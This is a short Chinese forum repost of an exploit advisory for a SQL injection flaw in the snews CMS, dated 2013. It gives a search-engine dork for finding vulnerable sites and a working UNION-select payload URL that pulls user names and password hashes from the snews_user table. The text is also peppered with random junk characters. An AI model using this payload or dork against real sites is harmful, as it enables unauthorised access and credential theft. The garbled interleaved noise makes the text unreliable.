标题: CMS snews SQL Injection Vulnerability3 \8 Z8 Y8 L; D* e1 |( e7 S
作者: By onestree- f9 l. v1 j+ x _
下载地址 : http://snewscms.com/: K: F# w: q; N' `
测试平台 : ubuntu 12.10 / win 7
: F# F: f8 [1 i( k关键词: inurl:"tanyakan pada rumput yang bergoyang"
% j$ _+ y1 l8 Q2 W7 h* o4 v8 i
3 }5 _2 q" g% P: j' ^
l# I- y- d) I- Q$ W' \$ R% \*************************************************************4 y$ Z$ c' @8 y
7 w( [6 }/ n2 M, u
SQL poc:. n4 F, M q: \
8 p3 O6 z2 ~* }: X" f1 r; J/ xhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]( o4 X9 {6 A' c. Q% l7 ?
* y/ i8 g: U$ c& q
示例4 |- c9 a! l1 d8 M3 D4 F+ W( W
2 {0 ^7 G- ^) x, I: [4 o0 s6 H
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
7 F; Z) r3 [5 q8 p3 r; V) H: R ' o7 R( u+ L5 O$ ?$ \% l; y
o8 I& U) v% P致谢:" @: k2 ]) u+ P) W1 {9 j8 U( }
7 l) T1 \2 |8 P- U9 u( K
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell2 R# m! w/ {2 Z/ ]. {3 {* W, T0 _
: ^$ | @% D1 E/ F8 c1 l. x indonesiancoder - moeslimh4x0r - go-coder0 ~ K: K/ R! x- v/ h! |
- s$ G" ~, X5 K- v$ I6 ]
spesial my hunny :*
# V7 W3 M, M0 I: x3 ]4 N |
发表于 2013-1-23 08:55:06
收藏
支持
反对